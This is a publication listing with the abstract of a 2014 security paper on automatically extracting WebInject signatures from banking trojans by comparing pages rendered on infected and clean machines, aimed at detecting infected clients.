ZARATHUSTRA: Extracting WebInject Signatures from Banking Trojans
Venue
Twelfth Annual International Conference on Privacy, Security and Trust, IEEE (2014), pp. 139-148
Publication Year
2014
Authors
Claudio Criscione, Fabio Bosatelli, Stefano Zanero, Federico Maggi
BibTeX
Abstract
Modern trojans are equipped with a functionality, called WebInject, that can be
used to silently modify a web page on the infected end host. Given its flexibility,
WebInject-based malware is becoming a popular information-stealing mechanism. In
addition, the structured and well-organized malware-as-a-service model makes
revenue out of customization kits, which in turns leads to high volumes of binary
variants. Analysis approaches based on memory carving to extract the decrypted
webinject.txt and config.bin files at runtime make the strong assumption that the
malware will never change the way such files are handled internally, and therefore
are not future proof by design. In addition, developers of sensitive web
applications (e.g., online banking) have no tools that they can possibly use to
even mitigate the effect of WebInjects. WebInject-based trojans insert client-side
code (e.g., HTML, JavaScript) while the targeted web pages (e.g., online banking
website, search engine) are rendered on the browser. This additional code will
capture sensitive information entered by the victim (e.g., one-time passwords) or
perform other nefarious actions (e.g., click fraud or search engine result
poisoning). The visible effect of a WebInject is that a web page rendered on
infected clients differs from the very same page rendered on clean machines. We
leverage this key observation and propose an approach to automatically characterize
the WebInject behavior. Ultimately, our system can be applied to analyze a sample
automatically against a set of target websites, without requiring any manual
action, or to generate fingerprints that are useful to determine whether a client
is infected. Differently from the state of the art, our method works regardless of
how the WebInject module is implemented and requires no reverse engineering. We
implemented and evaluated our approach against live online websites and a dataset
of distinct variants of WebInject-based financial trojans. The results show that
our approach correctly recognize known variants of WebInject-based malware with
negligible false positives. Throughout the paper, we describe some use cases that
describe how our method can be applied in practice
